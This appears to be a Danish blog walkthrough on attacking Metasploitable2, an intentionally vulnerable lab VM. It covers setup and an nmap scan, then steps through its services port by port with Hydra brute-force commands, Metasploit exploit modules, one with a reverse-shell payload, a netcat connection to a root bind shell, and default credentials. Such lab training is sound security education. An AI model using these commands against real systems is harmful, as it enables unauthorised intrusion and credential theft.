Metasploitable2

Metasploitable er en bevidst sårbar virtuel Linux-maskine.

Denne virtuelle maskine kan bruges til at gennemføre sikkerhedstræning, teste sikkerhedsværktøjer og øve sig i almindelige penetrationstestteknikker.

Installation og konfiguration

Vi er her for at udnytte Metasploitable 2 (Damn vulnerable machine for penetration testing)

Hent denne Metasploiable2-maskine fra https://information.rapid7.com/download-metasploitable-2017.html

Installationsproces:

  1. Åbn VirtualBox og klik på “New” knappen for at oprette en ny virtuel maskine
  2. Typ navnet på den virtuelle maskine(Metasploitable2)
  3. Alloker mængden af hukommelse(helst, men ikke under 512mb)
  4. Vælg Use an existing hard disk file
  5. Vælg vmdk filen, som du har hentet fra Rapid7
  6. Klik på Create…!!! Succesfuldt installeret Metasploitable2, Nu er det tid til at konfigurere netværksindstillingerne.

Efter installationen ændrer du indstillingerne for netværkskortet som følger :

In-Network Setting: Indstillinger/Netværk/Adapter Vælg Ethernet eller Trådløs

I fanen Avanceret Vælg: Promiscuous Mode som Allow All

Boot op Metasploitable2-maskinen og prøv at logge ind med de givne legitimationsoplysninger på Banner…!!!!

Find maskinens IP-adresse ved at bruge følgende kommando i terminal

ifconfig

Det er alt for opsætning….Lad os begynde at hacke…

Scanning

Scanning af Matasploitable 2

Som vi bemærkede, er maskinens IP-adresse 192.168.0.130

Lad os begynde at scanne med Nmap, som er en del af Kali Linux

nmap -sV -p- 192.168.0.130

Udnyttelse af alle porte i forskellige teknikker :

Metode 1:

Login med Anonymous som brugernavn og ingen adgangskode.

Hvis du har brug for mere info om Anonymous FTP kan du finde det her.

https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol

ftp 192.168.0.130

Metode 2 :

Gennem Brute-force med Hydra, men du skal have en brugerdefineret liste over brugernavne og adgangskoder.

hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V

Den vil tage hvert brugernavn og password fra de givne filer og forsøge at logge ind på FTP-tjenesten for målet.

Når du har fundet legitimationsoplysningerne, kan du logge direkte ind.

Når du er logget ind på en brugerkonto, kan du få root-adgang ved at foretage Privilege Escalation.

Metode 3 :

Udnyttelse af FTP via Metasploit framework

åbne Metasploit framework konsol og søge efter vsftpd Backdoor exploit

msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor

show options

set RHOSTS 192.168.0.130 --> <target IP address>exploit

Godt tillykke, du fik root-adgang

22-SSH

Secure Shell (SSH) er en kryptografisk netværksprotokol til at betjene netværkstjenester sikkert over et usikkert netværk.

Udnyttelse af SSH i forskellige teknikker

Metode 1

Kracking af brugernavn og adgangskode med Hydra

Hydra er et indbygget værktøj i Kali-Linux, der bruges til Brute force-angreb er en forsøgs- og fejlmetode, der bruges af applikationsprogrammer til at afkode krypterede data såsom adgangskoder eller Data Encryption Standard (DES)-nøgler, gennem udtømmende anstrengelser (ved hjælp af brute force) i stedet for at anvende intellektuelle strategier.

hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>

Metode 2

Åbn Metasploit framework

Åbn terminal og skriv disse kommandoer :

service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login

indstil denne auxiliary og se, hvad den kræver.

set RHOSTS <target IP Address> --> in my case 192.168.0.130

Sæt foruddefineret Brugernavne liste og Adgangskoder Liste

set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit

Det vil tage tid-baseret dine brugernavne og adgangskoder Liste og Det vil Notify med brugernavn: adgangskode og logge ind med disse legitimationsoplysninger.

ssh username@targetipaddress

Du har brugeradgang, kan ikke udføre alle opgaverne, så prøv at få root-adgang ved at gøre Privilege escalation.

23-TELNET

Telnet er en simpel, tekstbaseret netværksprotokol, der bruges til at få adgang til fjerncomputere over TCP/IP-netværk som f.eks. internettet. Telnet blev oprettet og lanceret i 1969, og historisk set kan man sige, at det var det første internet.

telnet <target IP Address> --> 192.168.0.130

Som standard vil den Grab Metasploitable 2 banner, det viser, at Login med msfadmin/msfadmin for at komme i gang. Bare indtast disse legitimationsoplysninger, så er du inde.

25-SMTP

SMTP er en del af applikationslaget i TCP/IP-protokollen. Ved hjælp af en proces, der kaldes “store and forward”, flytter SMTP din e-mail på og på tværs af netværk. Den arbejder tæt sammen med noget, der kaldes Mail Transfer Agent (MTA), for at sende din kommunikation til den rigtige computer og e-mail-indbakke.

Metode 1:

Ved hjælp af Metasploit

Start Metasploit ved at udføre kommandoerne

service postgresql startmsfconsole -qsearch smtp_version

use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run

SMTP står for Simple Mail Transport Protocol og er en server-til-server-protokol og fører en lokal database over de brugere, som den skal sende og modtage e-mails til.

SMTP har et sæt af kommandoer. Vi vil oprette forbindelse til vores mål med “netcat” gennem port 25 og forsøge at erhverve denne database e-mails.

Åbn en ny terminal, og skriv:

nc 192.168.0.130 25

Nu er forbindelsen etableret, du kan verificere ved hjælp af “SMTP”-kommandoerne

vrfy (Dette er en ikke-interaktiv shell)

For SMTP Commands Visit: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm

Metode 2

Vejledning af smtp_enum

Dette kan gøres af Metasploit

search smtp_enum

use auxiliary/scanner/smtp/smtp_enum

show optionsset RHOST 192.168.0.130exploit

Denne metode bruger opregning til at finde frem til denne liste over brugere i SMTP-tjenesten.

Sidst kan NetCat være nyttigt for at få en omvendt forbindelse med denne bruger.

139&445 Netbios-SSN

Samba er et open source-projekt, der er meget udbredt på Linux- og Unix-computere, så de kan arbejde med Windows-fil og -udskriftstjenester.

Vi kan endda bruge Samba som en Active-server til at håndtere login, godkendelse og adgangskontrol for et Windows-netværk.

Søg efter exploit

use exploit/multi/samba/usermap_script

For at få vist indstillingerne for udnyttelsen

show optionsSet RHOST192.168.0.130 (Target IP address)

Sæt payload

Show payloadsSet payload cmd/unix/reverse

Sæt nødvendige argumenter for payload

Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444

Kontroller, når alle krævede argumenter er udfyldt

exploit
exploit

1099-Java-RMI

Remote Method Invocation (RMI) er en API, der gør det muligt for et objekt at påkalde en metode på et objekt, der findes i et andet adresseområde, som kan være på den samme maskine eller en fjernmaskine.

Exploiting java-RMI-server

søg efter exploit

search java_rmi_server

Vælg exploit efter deres rang. f.eks. fungerer “excellent” bedre end “normal”.

use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit

Vi har fået adgang til målmaskinen.

1524-BINDSHELL

Bind shell er en type shell, hvor målmaskinen åbner en kommunikationsport eller en lytter på offermaskinen og venter på en indgående forbindelse. Angriberen opretter derefter forbindelse til offermaskinens lytter, som derefter fører til udførelse af kode eller kommando på serveren.

Exploitation

Det er en root shell, så vi kan oprette forbindelse via netcat-tjenesten.

nc <target ip address> 1524

Godt tillykke, du er en root-bruger nu.

2121-ProFTPD

Hvor du udnytter denne port skal du have loginoplysninger, så som vi kender metoden få det gennem Brute-force-teknik, Vi kan få adgang til ProFTPd med telnet, Vi bruger her bruger: user.

telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>

Det er en normal bruger, Prøv Privilege Escalation for at få root kontrol.

3306-MYSQL

Metode 1:

Søg efter exploit

search scanner/mysql/mysql_login

use auxiliary/scanner/mysql/mysql_login

I nogle tilfælde kan der være en chance for at have en tom adgangskode til MySQL. Så vi kan udnytte det direkte.

Bemærk: som standard viser den BLANK_PASSWORDS som false, sæt den til true.

set BLANK_PASSWORDS as true

Metode:2

I denne metode vil vi udnytte MySQL ved at bruge denne kommando, der giver brugernavnet som root og målets IP.

mysql -u root -h <target's IP>

3632-DISTCCD

Distcc er et værktøj til at fremskynde kompileringen af kildekode ved hjælp af distribueret databehandling over et computernetværk. Med den rigtige konfiguration

distcc kan reducere et projekts kompileringstid dramatisk

Udnyttelse af port 3632 ved hjælp af distcc-exec

Åbn msfconsole og søg efter distcc_exec

search distcc_execshow options

Sæt de nødvendige argumenter for at udnytte

set RHOSTS <target-ip>exploit

Vi fik Shell-adgang…Prøv at lave privilege escalation for Higher privilege

Exploiting PostgreSQL with postgre_payload

Open msfconsole & search for postgres_payload

search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options

Sæt nødvendige argumenter for exploit

set RHOSTS <target-ip>

Som standard, den vil bruge brugernavn som postgres

exploit

Successfully logged in postgresql…Lad os få en shell til at gøre flere ting…

Prøv at lave privilege escalation…God fornøjelse med at lære..!!!

5900-VNC

Åbn msfconsole og søg efter exploit vnc_login

search vnc_loginuse auxiliary/scanner/vnc/vnc_login

show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit

Denne metode bruges til at udnytte VNC-software hostet på Linux- eller Unix- eller Windows-operativsystemer med autentificeringssårbarhed.

Try to connect vnc with that password

Open Vnc Viewer in Terminal &Typ IP-adressen og opret forbindelse

en login prompt popup og beder om at angive legitimationsoplysninger

Derpå indtastes adgangskoden og klik på OK.

Voilaaa…!!!! du fik adgang…Jeg ved, hvad du tænker lige nu…Lad være med at rode med tingene rundt..Happy Learning.

6000-X11

The X Window System (aka X) er et vinduessystem til bitmap-skærme, som er almindeligt på UNIX-baserede operativsystemer. X udgør den grundlæggende ramme for et GUI-baseret miljø.

Den eksterne X11-server accepterer forbindelser fra alle steder, hvor man kan få en internetforbindelse. Den er ansvarlig for adgangen til grafikkortet, input-enhederne og skærmen på enten computeren eller den trådløse enhed.

Udnyttelse af port 6000 ved hjælp af ssh

ssh -X -l msfadmin 192.168.0.122

I ovenstående kommando aktiverer ‘X’ alle ports forwarding, ved at angive brugernavn og målets IP giver os shell

6667 & 6697 UnrealIRCD

UnrealIRCd er en Open Source IRC Server, der har tjent tusindvis af netværk siden 1999. Den kører på Linux, OS X og Windows

UnrealIRCd er en meget avanceret IRCd med et stærkt fokus på modularitet, en avanceret og meget konfigurerbar konfigurationsfil. Nøglefunktioner omfatter SSL

UnrealIRCd er en af de mest populære og fuldt udbyggede IRC-dæmoner og bruges på det største antal IRC-servere

Denne server beskrives som havende muligvis de fleste sikkerhedsfunktioner af alle IRC-servere.

Anvendte protokoller: Internet Relay Chat

Lad os udnytte denne IRC-server.

Metode 1: på port 6667

search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options

Sæt de nødvendige argumenter for exploit

set RHOSTS <target-ip>

Der tildeles som standard 6667 portnummer til exploit

run (or) exploit

Heyyy…Vi fik rod…Vi lever på kanten…

Metode 2: På port 6697

Brug ovenstående exploit og indstil de nødvendige argumenter

  • Denne gang indstilles port som 6697
set RHOSTS <target-ip>set RPORT 6697

Og anden gang fik vi også root…Prøv at udnytte dette… God læring

8180-TOMCAT

Apache Tomcat er en open source-implementering af Java Servlet-, JavaServer Pages-, Java Expression Language- og WebSocket-teknologierne. Tomcat tilbyder et “rent Java” HTTP-webservermiljø, hvor Java-kode kan køre.

Udnyttelse af Apache-Tomcat

Det kan gennemføres i to trin:

Åbn msfconsole & søg efter tomcat_mgr_login

search tomcat_mgr_loginset RHOSTS <target-ip>

show options

Exploit vil tildele standard brugernavne & adgangskoder lister. Efter indstilling af argumenterne til exploit Type exploit (eller) run

run

Tag det samme brugernavn og password og giv det til den næste exploit.

søg efter tomcat manager exploits

search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options

Sæt RHOSTS, RPORT og HttpPassword, HttpUsername, som vi fik fra tomcat login exploit, og kør derefter exploit’et.

msfconsole kunne tildele den passende payload til en exploit, Det er derfor vi fik meterpreter…

8787-Ruby-drb

dRuby er et distribueret objektsystem til Ruby. Det er skrevet i ren Ruby og bruger dets protokol.

Der er ikke brug for nogen tillægstjenester ud over dem, der leveres af Ruby-køretiden, såsom TCP-soketter.

search drb_remote_codeexec

Sæt de nødvendige argumenter for at udnytte

show optionsset RHOSTS <target-ip>exploit (or) run

Kongratulation, du har fået root shell-adgang … prøv at bruge nogle shell-kommandoer.

Skriv et svar

Din e-mailadresse vil ikke blive publiceret.